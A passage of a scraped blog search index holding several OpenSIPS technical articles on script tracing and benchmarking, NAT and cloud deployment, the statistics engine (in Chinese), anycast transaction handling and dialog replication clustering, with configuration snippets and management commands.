So you simply attach to the function a log line (with variables, of course) that will be evaluated and printed for each function in the script:\nscript_trace( 1, “$rm from $si, ruri=$ru”, “me”);\nwill produce:\n[line 578][me][module consume_credentials] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 581][me][core setsflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 583][me][assign equal] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 592][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 585][me][module is_avp_set] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 589][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 586][me][module is_method] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 587][me][module trace_dialog] -\u0026gt; (INVITE 127.0.0.1 , ruri=sip:tester@opensips.org) [line 590][me][core setflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org)\nAgain, you can enable the script tracing only for some cases (on demand). 
For example I want to trace only calls from a certain subscriber, so I can use the dialplan module and create in DB rules to match the subscribers I’m interested in tracing:\nif ( dp_translate(“1″,”$fU/$var(foo)”) )\ncaller must be traced according to dialplan 1 script_trace( 1, “$rm from $si, ruri=$ru”, “me”);\nBenchmarking the script Assuming that you get to a point where you managed to troubleshoot and fix your script in terms of the execution flow, you now may be interested in troubleshoot the script execution from the time perspective – how much time takes OpenSIPS to execute certain parts of the script.This is a mandatory step if you want to perform a performance analysis of your OpenSIPS setup.The benchmark module will help you to measure the time OpenSIPS took to execute different parts of the script:\nbm_start_timer(“lookup-timer”); lookup(“location”); bm_log_timer(“lookup-timer”);\nAn interesting capability of the module is to provide information about the current usage, but also aggregated information from the past, like how many times a certain timer was used or what was the total time spent in a timer (see the full provided information). And even more, such information can be pulled via Management Interface via the bm_poll_results command, for external usage:\nopensipsctl fifo bm_poll_results register-timer 3/40/12/14/13.333333 9/204/12/97/22.666667 lookup-timer 3/21/7/7/7.000000 9/98/7/41/10.888889\nIdentifying script bottlenecks But still you need to find the weak points of your script in terms on time to process. Or the bottlenecks of your script.OpenSIPS provides a very useful mechanism for this – the time thresholds. There are different thresholds, for different operations, that can be set in OpenSIPS core and modules. 
Whenever the execution takes longer than configured, OpenSIPS will report it to the log, together with additional useful information (such as operation details or script backtrace):\nexec_msg_threshold (core) – the maximum number of microseconds the processing of a SIP msg is expected to last. This is very useful to identify the “slow” functions in your overall script; exec_dns_threshold (core) – the maximum number of microseconds a DNS query is expected to last. This is very useful to identify what are the “slow” DNS queries in your routing (covering also SRV, NAPTR queries too);** tcp_threshold (core) – maximum number of microseconds sending a TCP request is expected to last. This is useful to identify the “slow” TCP connections (in terms of sending data). Note that this option will cover all TCP-based transports, like TCP plain, TLS, WS, WSS, BIN or HEP. exec_query_threshold (db_mysql module) – maximum number of microseconds for running a mysql query. This is useful to identify the “slow” query you may have. Note that this option covers all the mysql queries you may have in OpenSIPS – from script level or internally triggered by modules. A similar option is also in the db_postgres module too. An example for the output trigger by the exec_msg_threshold :\nopensips[17835]: WARNING:core:log_expiry: threshold exceeded : msg processing took too long – 223788 us.Source : BYE sip:………. 
opensips[17835]: WARNING:core:log_expiry: #1 is a module action : match_dialog – 220329us – line 1146 opensips[17835]: WARNING:core:log_expiry: #2 is a module action : t_relay – 3370us – line 1574 opensips[17835]: WARNING:core:log_expiry: #3 is a module action : unforce_rtp_proxy – 3297us – line 1625 opensips[17835]: WARNING:core:log_expiry: #4 is a core action : 78 – 24us – line 1188 opensips[17835]: WARNING:core:log_expiry: #5 is a module action : subst_uri – 8us – line 1201\nGood luck with the troubleshooting and be sure your OpenSIPS rocks !!\n","permalink":"https://wdd.js.org/opensips/blog/troubleshooting-opensips-script/","summary":"What makes OpenSIPS such an attractive and powerful SIP solution is its high level of programmability, thanks to its C-like configuration script. But once you get into the “programming” area, you will automatically need tools and skills for troubleshooting.So here there are some tips and tools you can use in OpenSIPS for “debugging” your configuration script.\nControlling the script logging The easiest way to troubleshoot your script is of course by using the xlog() core function and print your own messages.","title":"Troubleshooting OpenSIPS script"},{"content":"Cloud computing is a more and more viable option for running and providing SIP services. The question is how compatible are the SIP services with the Cloud environment ? So let’s have a look at this compatibility from the most sensitive (for SIP protocol) perspective – the IP network topology.A large number of existing clouds (like EC2, Google CP, Azure) have a particularity when comes to the topology of the IP network they provide – they do not provide public routable IPs directly on the virtual servers, rather they provide private IPs for the servers and a fronting public IP doing a 1-to-1 NAT to the private one.Such a network topology forces you to run the SIP service behind a NAT. Why is this such a bad thing? 
Because, unlike other protocols (such as HTTP), SIP is very intimate with the IP addresses – the IPs are part of the SIP messages and used for routing. So, a SIP server running on a private IP advertises its listening IP address (the private one) in the SIP traffic – this will completely break the SIP routing, both at transaction and dialog level :\ntransaction level – when sending a SIP request, the SIP server will construct the Via SIP header using its listening IP, so the private IP. But the information from the Via header is used by the receiver of the SIP request in order to route back the SIP replies. But routing to a private IP (from the public Internet) is mission impossible; dialog level – in a similar way, when sending an INVITE request, the SIP server will advertise in its Contact SIP header the private IP, so other SIP party will not be able to send any sequential request back to our server. So, how can OpenSIPS help you to run SIP services in the Cloud ?\nRunning OpenSIPS behind NAT OpenSIPS implements a smart mechanism of separating the IPs used at network level (as listeners) and the IPs inside the SIP messages.The “advertise” mechanism gives you full control of what IP is presented (or advertised) in the SIP messages, despite what IP is used for the networking communication. 
Shortly you can have OpenSIPS sending a SIP request from the 10.0.0.15 private IP address, but using for inside the message (as Via, Contact or Route) a totally different IP.When advertising a different IP (than the network layer), the following parts of the SIP message will be affected:\nthe introduced Via header (if a SIP request) the introduced Record-Route header (if a SIP request) the introduced Contact header OpenSIPS has a very flexible way to control the advertised IP, at different levels: global, per listening interface or per SIP transaction\nGlobal Advertising Such advertising will affect the entire traffic handled by OpenSIPS, automatically, without any additional action in the actual routing script. This setting is achieved via the advertised_address global parameter:\nadvertised_address=\u0026ldquo;12.34.56.78\u0026rdquo;\nPer Interface Advertising For more complex scenarios when using multiple listening interfaces, you can opt for different advertised IP for each listener. Some listener may be bound to the NATed IP address, so you want to do advertising, some other listener may be bound to a private IP used only inside the private network, so you want no advertising.\nlisten = udp:10.0.0.34:5060 as 99.88.44.33:5060\nlisten = udp:10.0.0.36:5060\nAll the SIP traffic routing through such an advertising interface will be automatically modified. 
The only thing you have to do is to be sure you properly control the usage of interfaces when you route your SIP traffic – usually switching to a different interface, by using the force_send_socket() script function.\nPer Transaction Advertising The finest granularity OpenSIPS offers for controlling the advertising IP is at SIP transaction level – that is, for each transaction (a SIP request and all its replies) you can choose what should be the advertised IP.Such control is done via the routing script – when routing the SIP requests, you can enforce a value to be advertised for its transaction:\nset_advertised_address( 12.34.56.78 );\nAs a small but important note : advertising a different IP identity may act as a boomerang – your OpenSIPS may be required to recognize itself based on IP you previously advertised. Like the IP advertised in an INVITE request in the Record-Route header must be recognized by OpenSIPS as “its own IP” later, when receiving a sequential request like ACK or BYE and inspecting the Route header.If for the global and per-interface advertising OpenSIPS is automatically able to recognize its own advertised IP’s, for the per-transaction level it cannot. So you have to explicitly take care of that and teach OpenSIPS about the IP’s you plan to advertise by using the alias core parameter.\nRunning RTPproxy behind NAT So far we covered the OpenSIPS related part. But in many SIP scenarios you may be required to handle the media/RTP too, for cases like call recording, media pinning, DTMF sniffing or other.So, you may end up with the need of running RTPproxy behind an 1-to-1 NAT. Fortunately things are much more simple here. The nature of the 1-to-1 NAT takes care of the port mapping between the public NAT IP and the private IP. 
The only thing you have to do is to advertise the public IP in the SIP SDP, while keeping RTPproxy to operate on the private IP.To get this done, when using one of the RTPproxy related functions like rtpproxy_engage(), rtpproxy_answer() or rtpproxy_offer(), simply use the second parameter of these function to overwrite (in the SDP) the IP received from RTPproxy with the IP you want to advertise:rtpproxy_engage(\u0026ldquo;co\u0026rdquo;,\u0026ldquo;23.45.67.89\u0026rdquo;);This will result in having the 23.45.67.89 IP advertised in the SDP, rather than the IP RTPproxy is running on. And no other change is required in the actual RTPproxy configuration.\nWhat’s next ? What we covered so far here is a relatively simple scenario, still it is the mostly used one – an OpenSIPS behind NAT serving SIP client on the public Internet.But things are getting more complicated and interesting when you also want to offer media services (like voicemail) or you want to support SIP clients from both public and private networks – and these are the topics for some future posts on this matter.\n","permalink":"https://wdd.js.org/opensips/blog/runing-opensips-in-cloud/","summary":"Cloud computing is a more and more viable option for running and providing SIP services. The question is how compatible are the SIP services with the Cloud environment ? So let’s have a look at this compatibility from the most sensitive (for SIP protocol) perspective – the IP network topology.A large number of existing clouds (like EC2, Google CP, Azure) have a particularity when comes to the topology of the IP network they provide – they do not provide public routable IPs directly on the virtual servers, rather they provide private IPs for the servers and a fronting public IP doing a 1-to-1 NAT to the private one.","title":"Running OpenSIPS in the Cloud"},{"content":"无论你是经验丰富的OpenSIPS管理员,或者你仅仅想找到为什么ACK消息在你的网络中循环发送,唯一可以确定的是:我们或早或晚会需要OpenSIPS提供数据来回答以下问题\nOpenSIPS运行了多久? 我们是否被恶意流量攻击了? 
我们的平台处理了多少个来自运营商的无效SIP包 在流量峰值时,OpenSIPS是否拥有足够的内存来支撑运行 \u0026hellip; 幸运的是,OpenSIPS提供内置的统计支持,来方便我们快速解决以上问题。详情可以查看OpenSIPS统计接口。在本篇文章中,我们将会了解统计引擎,但是,什么是引擎?\n统计引擎 总的来说,下图就是OpenSIPS引擎的样子。\n统计引擎内置于OpenSIPS。它管理所有的统计数据,并且暴露一个标准的CRUD操作接口给所有的模块,让模块可以推送或者管理他们自己的统计数据。\n以下有三种方式来和统计引擎进行交互\n直接通过脚本访问。如通过$script(my-stat)变量 使用HTTP请求来访问 使用opensipsctl fifo命令 统计引擎是非常灵活并且可以通过不同方式与其交互,那么它怎么能让我们的使用变得方便呢?下面的一些建议,能够让你全面地发挥统计引擎的能力,来增强某些重要的层面。\n系统开发维护 当你处理OpenSIPS的DevOps时,你经常需要监控OpenSIPS的一些运行参数。你的关注点不同,那么你就需要监控不同的方面,例如SIP事务、对话、内存使用、系统负载等等\n下面是OpenSIPS统计分组的一个概要,以及组内的每一个统计值,详情可以参考wiki。\n统计简介 假如我们想通过sipp对我们的平台进行流量测试,我们想压测期间观测当前的事务、对话、共享内存的值变化。或者我们有了一个新的SIP提供商,他们每天早上9点会开始向我们平台推送数据,我们需要监控他们的推送会对我们系统产生的影响。\n你可以在OpenSIPS实例中输入以下指令:\nwatch -n0.2 \u0026#39;opensipsctl fifo get_statistics inuse_transactions dialog: shmem:\u0026#39; 注意 get_statistics命令既可以接受一个统计值项,也可以接受一个统计组的项。统计组都是以冒号(:)结尾。\n与递增的统计指标进行交互 统计指标看起来相同,实际上分为两类\n累计值。累计值一般随着时间增长,例如rcv_requests, processed_dialogs,表示从某个时间点开始累计收到或者处理了多少个任务 计算值。计算值一般和系统运行负载有关,和时间无关。例如active_dialogs, real_used_size, 这些值都是由内部函数计算出来的计算值 一般来说,脚本中定义的统计值都是递增的,OpenSIPS无法重新计算它,只能我们自己来计算或者维护它的值。\n以下方式可以快速查看计算值类的统计项\nopensipsctl fifo list_statistics 某些场景,你可能需要周期性地重置累计值类的统计项。例如你可能只需要统计当天的processed_dialogs,daily_routed_minutes,那么你只需要设置一个定时任务,每天0点,重置这些统计值。\nopensipsctl fifo reset_statistics processed_dialogs 在脚本中自定义统计项 在脚本中自定义统计项是非常简单的,只需要做两步\n加载statistics.so模块 在某些位置调用函数, update_stat(\u0026quot;daily_routed_minutes\u0026quot;, \u0026quot;+1\u0026quot;) 实战:脚本中有许多的自定义统计项 统计每天收到的SIP消息的请求方式, 以及处理的消息长度 每隔24小时,以JSON的形式,将统计数据推送到Web服务器 # 设置统计组 modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_groups\u0026#34;, \u0026#34;method, packet\u0026#34;) # 请求路由 route { ... update_stat(\u0026#34;method:$rm\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) # message length ... 
} # 响应路由 onreply_route { update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) } # 定时器路由,定时通过HTTP发请求 timer_route [daily_stat_push, 86400] { $json(all_stats) := \u0026#34;{\\\u0026#34;method\\\u0026#34;: {}, \\\u0026#34;packet\\\u0026#34;: {}}\u0026#34;; # pack and clear all method-related statistics stat_iter_init(\u0026#34;method\u0026#34;, \u0026#34;iter\u0026#34;); while (stat_iter_next(\u0026#34;$var(key)\u0026#34;, \u0026#34;$var(val)\u0026#34;, \u0026#34;iter\u0026#34;)) { $json(all_stats/method/$var(key)) = $var(val); reset_stat(\u0026#34;$var(key)\u0026#34;); } # pack and clear all packet-related statistics stat_iter_init(\u0026#34;packet\u0026#34;, \u0026#34;iter\u0026#34;); while (stat_iter_next(\u0026#34;$var(key)\u0026#34;, \u0026#34;$var(val)\u0026#34;, \u0026#34;iter\u0026#34;)) { $json(all_stats/packet/$var(key)) = $var(val); reset_stat(\u0026#34;$var(key)\u0026#34;); } # push the data to our web server if (!rest_post(\u0026#34;https://WEB_SERVER\u0026#34;, \u0026#34;$json(all_stats)\u0026#34;, , \u0026#34;$var(out_body)\u0026#34;, , \u0026#34;$var(status)\u0026#34;)) xlog(\u0026#34;ERROR: during HTTP POST, $json(all_stats)\\n\u0026#34;); if ($var(status) != 200) xlog(\u0026#34;ERROR: web server returned $var(status), $json(all_stats)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/blog/deepin-stat-engine/","summary":"无论你是经验丰富的OpenSIPS管理员,或者你仅仅想找到为什么ACK消息在你的网络中循环发送,唯一可以确定的是:我们或早或晚会需要OpenSIPS提供数据来回答以下问题\nOpenSIPS运行了多久? 我们是否被恶意流量攻击了? 
我们的平台处理了多少个来自运营商的无效SIP包 在流量峰值时,OpenSIPS是否拥有足够的内存来支撑运行 \u0026hellip; 幸运的是,OpenSIPS提供内置的统计支持,来方便我们快速解决以上问题。详情可以查看OpenSIPS统计接口。在本篇文章中,我们将会了解统计引擎,但是,什么是引擎?\n统计引擎 总的来说,下图就是OpenSIPS引擎的样子。\n统计引擎内置于OpenSIPS。它管理所有的统计数据,并且暴露一个标准的CRUD操作接口给所有的模块,让模块可以推送或者管理他们自己的统计数据。\n以下有三种方式来和统计引擎进行交互\n直接通过脚本访问。如通过$script(my-stat)变量 使用HTTP请求来访问 使用opensipsctl fifo命令 统计引擎是非常灵活并且可以通过不同方式与其交互,那么它怎么能让我们的使用变得方便呢?下面的一些建议,能够让你全面地发挥统计引擎的能力,来增强某些重要的层面。\n系统开发维护 当你处理OpenSIPS的DevOps时,你经常需要监控OpenSIPS的一些运行参数。你的关注点不同,那么你就需要监控不同的方面,例如SIP事务、对话、内存使用、系统负载等等\n下面是OpenSIPS统计分组的一个概要,以及组内的每一个统计值,详情可以参考wiki。\n统计简介 假如我们想通过sipp对我们的平台进行流量测试,我们想压测期间观测当前的事务、对话、共享内存的值变化。或者我们有了一个新的SIP提供商,他们每天早上9点会开始向我们平台推送数据,我们需要监控他们的推送会对我们系统产生的影响。\n你可以在OpenSIPS实例中输入以下指令:\nwatch -n0.2 \u0026#39;opensipsctl fifo get_statistics inuse_transactions dialog: shmem:\u0026#39; 注意 get_statistics命令既可以接受一个统计值项,也可以接受一个统计组的项。统计组都是以冒号(:)结尾。\n与递增的统计指标进行交互 统计指标看起来相同,实际上分为两类\n累计值。累计值一般随着时间增长,例如rcv_requests, processed_dialogs,表示从某个时间点开始累计收到或者处理了多少个任务 计算值。计算值一般和系统运行负载有关,和时间无关。例如active_dialogs, real_used_size, 这些值都是由内部函数计算出来的计算值 一般来说,脚本中定义的统计值都是递增的,OpenSIPS无法重新计算它,只能我们自己来计算或者维护它的值。\n以下方式可以快速查看计算值类的统计项\nopensipsctl fifo list_statistics 某些场景,你可能需要周期性地重置累计值类的统计项。例如你可能只需要统计当天的processed_dialogs,daily_routed_minutes,那么你只需要设置一个定时任务,每天0点,重置这些统计值。\nopensipsctl fifo reset_statistics processed_dialogs 在脚本中自定义统计项 在脚本中自定义统计项是非常简单的,只需要做两步\n加载statistics.so模块 在某些位置调用函数, update_stat(\u0026quot;daily_routed_minutes\u0026quot;, \u0026quot;+1\u0026quot;) 实战:脚本中有许多的自定义统计项 统计每天收到的SIP消息的请求方式, 以及处理的消息长度 每隔24小时,以JSON的形式,将统计数据推送到Web服务器 # 设置统计组 modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_groups\u0026#34;, \u0026#34;method, packet\u0026#34;) # 请求路由 route { ... 
update_stat(\u0026#34;method:$rm\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) # message length .","title":"深入OpenSIPS统计引擎"},{"content":"The advantages of doing Load Balancing and High Availability **without** any particular requirements from the clients’ side are starting to make Anycast IPs more and more appealing in the VoIP world. But are you actually getting the best out of it? This article describes how you can use OpenSIPS 2.4 to make the best use of an anycast environment.Anycast is a UDP-based special network setup where a single IP is assigned to multiple nodes, each of them being able to actively use it (as opposed to a VRRP setup, where only one instance can use the IP). When a packet reaches the network with an anycast destination, the router sends it to the “closest” node, based on different metrics (application status, network latency, etc). This behavior ensures that traffic is (1) balanced by sending it to one of the least busy nodes (based on application status) and also ensures (2) geo-distribution, by sending the request to the closest node (based on latency). Moreover, if a node goes down, it will be completely put out of route, ensuring (3) high availability for your platform. All these features without any special requirements from your customers, all they need is to send traffic to the anycast IP.Sounds wonderful, right? It really is! And if you are using anycast IPs in a transaction stateless mode, things just work out of the box.\nState of the art A common Anycast setup is to assign the anycast IPs to the nodes at the edge of your platform, facing the clients. This setup ensures that all three features (load balancing, geo-distribution and high-availability) are provided for your customers’ inbound calls. 
However, most of the anycast “stories” we have heard or read about are only using the anycast IP for the initial incoming INVITEs from customers. Once received, the entire call is pinned to a unicast IP of the first server that received the INVITE. Therefore all sequential messages will go through that single unicast IP. Although this works fine from a SIP point of view, you will lose all the anycast advantages such as high-availability.When using this approach (of only receiving the initial request on the anycast IP) the inbound calls to the clients will also be affected, because besides losing dialog high-availability, you will also need to ask all your clients to accept calls from all your available unicast IPs. Imagine what happens when you add a new node.Our full anycast solution aims to sort out these limitations by always keeping the anycast IPs in the route for the entire call. This means that your clients will always have one single IP to provision, the anycast IP. And when a node goes down, all sequential messages will be re-routed (by the router) to the next available node. Of course, this node needs to have the entire call information to be able to properly close the call, but that can be easily done in OpenSIPS using dialog replication.Besides the previous issue, most of the time running in stateless mode is not possible due to application logic constraints (re-transmission handling, upstream timeout detection, etc.). Thus stateful transaction mode is required, which complicates our anycast scenario a bit more.\nAnycast in a transaction stateful scenario A SIP transaction consists of a request and all the replies associated to that request. According to the SIP RFC, when a stateful SIP proxy sends a request, the next hop should immediately send a reply as soon as it receives the request. Otherwise, the SIP proxy will start re-transmitting that request until it either receives a reply or eventually times out. 
Now, let’s consider the anycast scenario described in Figure 1: OpenSIPS instance 1 sends an INVITE to the client, originated from the Anycast IP interface. The INVITE goes through the Router, and reaches the Client’s IP. However, when the Client replies with 200 OK, the Router decides the “shortest” path is to OpenSIPS instance 2, which has no information about the transaction. Therefore, instance 2 drops all the replies. Moreover, since instance 1 did not receive any reply, it will start re-transmitting the INVITE. And so on, and so forth, until instance 1 times out, because it did not receive any reply, and the Client times out because there was no ACK received for its replies. Therefore the call is unable to complete.To overcome this behavior, we have developed a new mechanism that is able to handle transactions in such distributed environments. The following section describes how this is done.\nDistributed transactions handling Transactions are probably the most complicated structures in SIP, especially because they are very dynamic (requests and replies are exchanged within milliseconds) and they contain a lot of data (various information from the SIP messages, requests for re-transmissions, received replies, multiple branches, etc). That makes them very hard to move around between different instances. Therefore, instead of sending transaction information to each node within the anycast “cluster”, our approach was to bring the events to the node that created the transaction. 
This way we minimize the amount of data exchanged between instances – instead of sending huge transaction data, we simply replicate one single message – and we are only doing this when it’s really necessary – we are only replicating messages when the router that manages the anycast config switches to a different node.When doing distributed transaction handling, the logic of the transaction module is the following: when a reply comes on one server, we check whether the current node has a transaction for that reply. If it does (i.e. the router did not switch the path), the reply is processed locally. If it does not, then somebody else must “own” that transaction. The question is who? That’s where the SIP magic comes in: when we generate the INVITE request towards the client, we add a special parameter in the VIA header, indicating the ID of the node that created the transaction. When the reply comes back, that ID contains exactly the node that “owns” the transaction. Therefore, all we have to do is to take that ID and forward the message to it, using the proto_bin module. When the “owner” receives the reply, it “sees” it exactly as it would have received it directly from the client, thus treating it exactly as any other regular reply. And the call is properly established further. Figure 2. There is one more scenario that needs to be taken into account, namely what happens when a CANCEL message reaches a different node (Figure 2). Since there is no transaction found on node 2, normally that message would have been declined. However, in an anycast environment, the transaction might be “owned” by a different node; therefore, we need to instruct it that the transaction was canceled. However, this time we have no information about who “owns” that transaction – so all we can do is to broadcast the CANCEL event to all the nodes within the cluster. 
If any of the nodes that receive the event finds the transaction that the CANCEL refers to, it will properly reply with a 200 OK message and then close all the ongoing branches. If no transaction is found on any node, the CANCEL will eventually time out on the Client side.A similar approach is done for a hop-by-hop ACK message received on an anycast interface.\nAnycast Configuration The first thing we have to do is to configure the anycast address on each node that uses it. This is done in the listen parameter:\nlisten = udp:10.10.10.10:5060 anycast The distributed transaction handling feature relies on the clusterer module to group the nodes that use the same anycast address in a cluster. The resulting cluster id has to be provisioned using the tm_replication_cluster parameter of the transaction module:\nloadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;tm_replication_cluster\u0026#34;, 1) The last thing that we need to take care of is the hop-by-hop messages, such as ACK. This is automatically done by using the t_anycast_replicate() function: if (!loose_route()) { if (is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; !t_check_trans()) { # transaction not here - replicate msg to other nodes t_anycast_replicate(); exit; } } Notice that the CANCEL is not treated in the snippet above. That is because CANCEL messages received on an anycast interface are automatically handled by the transaction layer as described in the previous section. However, if one intends to explicitly receive the CANCEL message in the script to make any adjustments (e.g. change the message Reason), they can disable the default behavior using the cluster_auto_cancel param. However, this changes the previous logic a bit, since the CANCEL must be replicated as well in case no transaction is locally found:\nmodparam(\u0026#34;tm\u0026#34;, \u0026#34;cluster_auto_cancel\u0026#34;, no) ... 
if (!loose_route()) { if (!t_check_trans()) { if (is_method(\u0026#34;CANCEL\u0026#34;)) { # do your adjustments here t_anycast_replicate(); exit; } else if (is_method(\u0026#34;ACK\u0026#34;)) { t_anycast_replicate(); exit; } } } And that’s it – you have a fully working anycast environment, with distributed transaction matching!\nFind out more! The distributed transaction handling mechanism has already been released on the OpenSIPS 2.4 development branch. To find out more about the design and internals of this feature, as well as other use cases, make sure you do not miss the Full Anycast support at the edge of your platform using OpenSIPS 2.4 presentation about this at the Amsterdam 2018 OpenSIPS Summit, May 1-4!\n","permalink":"https://wdd.js.org/opensips/blog/full-anycast/","summary":"The advantages of doing Load Balancing and High Availability **without** any particular requirements from the clients’ side are starting to make Anycast IPs more and more appealing in the VoIP world. But are you actually getting the best out of it? This article describes how you can use OpenSIPS 2.4 to make the best use of an anycast environment.Anycast is a UDP-based special network setup where a single IP is assigned to multiple nodes, each of them being able to actively use it (as opposed to a VRRP setup, where only one instance can use the IP).","title":"Full Anycast support in OpenSIPS 2.4"},{"content":"Dialog replication in OpenSIPS has been around since version 1.10, when it became clear that sharing real-time data through a database is no longer feasible in a large VoIP platform. Further steps in this direction have been made in 2.2, with the advent of the clusterer module, which manages OpenSIPS instances and their inter-communication. But have we been able to achieve the objective of a true and complete solution for clustering dialog support? 
In this article we are going to look into the limitations of distributing ongoing calls in previous OpenSIPS versions and how we overcame them and added new possibilities in 2.4, based on the improved clustering engine.\nPrevious Limitations Up until this point, distributing ongoing dialogs essentially only consisted of sharing the relevant internal information with all other OpenSIPS instances in the cluster. To optimize the communication, whenever a new dialog is created (and confirmed) or an existing one is updated (state changes etc.), a binary message about that particular dialog is broadcasted.Limiting the data exchange to be driven by runtime events leaves an instance with no way of learning all the dialog information from the cluster when it boots up or at a particular moment in time. Consider what happens when we restart a backup OpenSIPS: any failover that we hope to be able to handle on that node will have to be delayed until it gets naturally in sync with the other node(s).But the more painful repercussion of just sharing data without any other distributed logic is the lack of a mechanism to coordinate certain data-related actions between the cluster nodes. For example, in a typical High-Availability setup with an active-passive node configuration, although all dialogs are duplicated to the passive node, the following must be performed exactly once:\ngenerate **BYE requests** and/or produce CDRs (Call Detail Records) upon dialog expiration; send Re-Invite or OPTIONS pings to end-points; send replication packets on dialog events; update the dialog database (if it is still used as a failsafe for binary replication, e.g. both nodes crash). 
Usage scenarios Before actually diving into how OpenSIPS 2.4 solves the aforementioned issues, let’s first see the most popular scenarios we considered when designing the dialog clustering support:\nActive – Backup setup for High Availability using Virtual IPs. The idea here would be to have a Virtual IP (or floating IP) facing the end-users. This IP will be automatically moved from a failed instance to a hot-backup server by tools like vrrpd, KeepaliveD, Heartbeat. Active – Active setup, or a double cross Active-Backup. This is a more “creative” approach using two Virtual IPs, each server being active for one of them and backup for the other, and still sharing all the dialogs, in order to handle both VIPs when a server fails. Anycast setup for Distributed calls (High Availability and Balancing). This relies on the newly added full support for **Anycast** introduced in OpenSIPS 2.4. You can find more details in the dedicated article. Dialog Clustering with OpenSIPS 2.4 The new dialog clustering support in OpenSIPS 2.4 addresses all the mentioned limitations by properly and fully covering the typical clustering scenarios. But first let’s look at the newly introduced concepts in OpenSIPS 2.4 when it comes to clustering dialogs.\nData synchronization In order to address our first discussed issue, the improved clustering under-layer in OpenSIPS 2.4 offers the capability of synchronizing a freshly booted node with the complete data set from the cluster in a fast and transparent manner. This way, we can minimize the impact of restarting an OpenSIPS instance, or plugging a new node in the cluster on the fly, without needing any DB storage or having to accept the compromise of lost dialogs. 
We can also perform a sync at any time via an MI command, if for some reason the dialog data got desynchronized on a given instance.\nDialog ownership mechanism The other big improvement that OpenSIPS 2.4 introduces for distributing dialogs is the capability to precisely decide which node in the cluster is responsible for a dialog – responsible in the sense of triggering certain actions for that dialog. This comes as a necessity because some of the dialogs are locally created on an instance, some are temporarily handled in place of a failed/inactive node and others are just kept as backup. As such, the concept of dialog “ownership” was introduced.The basic idea of this mechanism is that a single node in the dialog cluster (where all the calls are shared) is “responsible” at any time for a given dialog, in terms of taking actions for it. When the node owning the dialog goes down, another node becomes its owner and handles its actions.But how is this ownership concept concretely implemented in OpenSIPS 2.4?\nSharing tags In order to be able to establish an ownership relationship between the nodes and the dialog, we introduced the concept of tags or _“sharing tags”_ as we call them. Each dialog is marked with a single tag; on the other hand, a node is actively responsible for (owning) a tag (and indirectly all the dialogs marked with that tag). A tag may be present on several nodes, but only a single node sees the tag as active; the other nodes aware of that tag are seeing the tag in standby/backup mode.So each node may be aware of multiple sharing tags, each with an _active_ or backup state. Each tag can be defined with an implicit state at OpenSIPS startup or directly set at runtime and all this information is shared between the cluster nodes. When we set a sharing tag to active on a certain node, we are practically setting that node to become the owner of all its known dialogs that are marked with that particular tag. 
At the same time, if another node was active for the tag, it has to step down.To better understand this, we will briefly describe how the sharing tags should be used in the previously mentioned scenarios, considering a simple two-node cluster:\nin an active-backup cluster with a single VIP, we would only need a single sharing tag corresponding to the VIP address; the node that holds the VIP will also have the tag set to active and perform all the dialog related actions; in an active-active cluster with two VIPs, we would need two sharing tags, corresponding to each VIP, and whichever node holds the given VIP should have the appropriate tag set as active; in an anycast cluster setup, we will have one sharing tag corresponding to each node (because the dialog is tied to the node it was first created on, as opposed to an IP). If a node is up, it should have its corresponding tag active, otherwise any node can take the tag over. Configuration Setting up dialog replication in OpenSIPS 2.4 is very easy and, in the following, we will exemplify our discussed scenarios with the essential configuration:\n1. Active-backup setup Let’s use the tag named “vip” which will be configured via the dlg_sharing_tag module parameter. 
When starting OpenSIPS, you need to check the HA status of the node (by inspecting the HA system) and to decide which node will start as owner of the tag:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip=active\u0026rdquo;)if active or :modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip=backup\u0026rdquo;)if standby.During runtime, depending on the change of the HA system, the tag may be moved (as active) to a different node by using MI commands (see the following chapter).At script level, all we need to do, on each node, is to mark a newly created dialog with the sharing tag, using the set_dlg_sharing_tag() function:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); set_dlg_sharing_tag(\u0026ldquo;vip\u0026rdquo;);}\n2. Active-active setup Similar to the previous case, but we will use two tags, one for each VIP address. We will define the initial tag state for the first VIP, on the first node:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip1=active\u0026rdquo;)The second node will initially be responsible for the second VIP, so on node id 2 we will set:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip2=active\u0026rdquo;)Now, on each node, depending on which VIP we receive the initial Invite on, we mark the dialog appropriately:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); if ($Ri == 10.0.0.1 # VIP 1) set_dlg_sharing_tag(\u0026ldquo;vip1\u0026rdquo;); else if ($Ri == 10.0.0.2 # VIP 2) set_dlg_sharing_tag(\u0026ldquo;vip2\u0026rdquo;);}So, calls established via the 